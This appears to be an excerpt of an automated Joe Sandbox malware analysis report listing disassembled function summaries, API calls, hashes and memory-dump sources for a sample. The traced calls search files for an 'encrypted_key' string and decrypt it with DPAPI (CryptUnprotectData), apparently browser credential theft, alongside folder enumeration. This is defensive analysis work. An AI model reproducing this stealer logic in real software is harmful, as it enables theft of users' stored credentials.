                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: c2a3ff3fb4317045784a6a8a3e949baac89919cff40fc52b3cc79677a475b820
                                    • Instruction ID: c1cfa15989f04bf4b8234a9d9e61ceba9167f9d22a6da72ed628857e044e629d
                                    • Opcode Fuzzy Hash: c2a3ff3fb4317045784a6a8a3e949baac89919cff40fc52b3cc79677a475b820
                                    • Instruction Fuzzy Hash: D6416271D10109EFCB04EFA5D886BEEB778BF94305F008518E91677290EB756A09CFA6
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 009499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                      • Part of subcall function 009499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                      • Part of subcall function 009499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                      • Part of subcall function 009499C0: ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                      • Part of subcall function 009499C0: LocalFree.KERNEL32(0094148F), ref: 00949A90
                                      • Part of subcall function 009499C0: CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                      • Part of subcall function 00958E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00958E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00949D39
                                      • Part of subcall function 00949AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949AEF
                                      • Part of subcall function 00949AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00944EEE,00000000,?), ref: 00949B01
                                      • Part of subcall function 00949AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949B2A
                                      • Part of subcall function 00949AC0: LocalFree.KERNEL32(?,?,?,?,00944EEE,00000000,?), ref: 00949B3F
                                      • Part of subcall function 00949B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00949B84
                                      • Part of subcall function 00949B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00949BA3
                                      • Part of subcall function 00949B60: LocalFree.KERNEL32(?), ref: 00949BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: c44f95aee179775a7bde4cfca11c64caf5048f8e06c5b76dbbcef2e4372801de
                                    • Instruction ID: 5ebecbc820f4ae19ecf5d413d6c2f58dc40c0173e95e763228be4ab1f95f0e46
                                    • Opcode Fuzzy Hash: c44f95aee179775a7bde4cfca11c64caf5048f8e06c5b76dbbcef2e4372801de
                                    • Instruction Fuzzy Hash: 963100B5D10109ABDF14DFE4DC85FEFB7B8AB88304F144519F915A7281EB349A04CBA5
                                    APIs
                                    • CreateFileA.KERNEL32(00953AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00953AEE,?), ref: 009592FC
                                    • GetFileSizeEx.KERNEL32(000000FF,00953AEE), ref: 00959319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00959327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: cc55fc2fdb5c2fcb0dbf9b9e48e74a14f64c4874e9a7b593f0ee3a523da157fb
                                    • Instruction ID: f3fd3e75f7db682c939d78838bc5606d51503f3f8ca8ff5e917ad590e0bb4881
                                    • Opcode Fuzzy Hash: cc55fc2fdb5c2fcb0dbf9b9e48e74a14f64c4874e9a7b593f0ee3a523da157fb
                                    • Instruction Fuzzy Hash: AFF08C38E00208FBEB10DBB1DC08B9E77B9EB48311F108654BA11A72D0DA749A00DB40
                                    APIs
                                    • __getptd.LIBCMT ref: 0095C74E
                                      • Part of subcall function 0095BF9F: __amsg_exit.LIBCMT ref: 0095BFAF
                                    • __getptd.LIBCMT ref: 0095C765
                                    • __amsg_exit.LIBCMT ref: 0095C773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0095C797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: edc6832a2f14babed69f041fbe2e598602ceeca0c5f9940aeccb4259f880f6e5
                                    • Instruction ID: 37d7c7c5ab859e2058f87f829c535cd93ed0c76d70f3cf309fd985f1eda1eec9
                                    • Opcode Fuzzy Hash: edc6832a2f14babed69f041fbe2e598602ceeca0c5f9940aeccb4259f880f6e5
                                    • Instruction Fuzzy Hash: 71F0B4729047109FD720FBBA580774D33E06F84727F244149FC14F65D2DB6459889F56
                                    APIs
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954F7A
                                    • lstrcat.KERNEL32(?,00961070), ref: 00954F97
                                    • lstrcat.KERNEL32(?,015E8AA0), ref: 00954FAB
                                    • lstrcat.KERNEL32(?,00961074), ref: 00954FBD
                                      • Part of subcall function 00954910: wsprintfA.USER32 ref: 0095492C
                                      • Part of subcall function 00954910: FindFirstFileA.KERNEL32(?,?), ref: 00954943
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,00960FDC), ref: 00954971
                                      • Part of subcall function 00954910: StrCmpCA.SHLWAPI(?,00960FE0), ref: 00954987
                                      • Part of subcall function 00954910: FindNextFileA.KERNEL32(000000FF,?), ref: 00954B7D
                                      • Part of subcall function 00954910: FindClose.KERNEL32(000000FF), ref: 00954B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 55e1df81d840072589af4a2ef86b5c596966a1adfef51d049b8d4dce88eb637a
                                    • Instruction ID: 8068874edc18d9f8546f14b2d10feee1c21f82ff732833ec41e5c7e824dc0242
                                    • Opcode Fuzzy Hash: 55e1df81d840072589af4a2ef86b5c596966a1adfef51d049b8d4dce88eb637a
                                    • Instruction Fuzzy Hash: 5B21A776900208A7DB54FBB0DC46FEE337CABD4701F004559BA5993191EE74AACDCBA2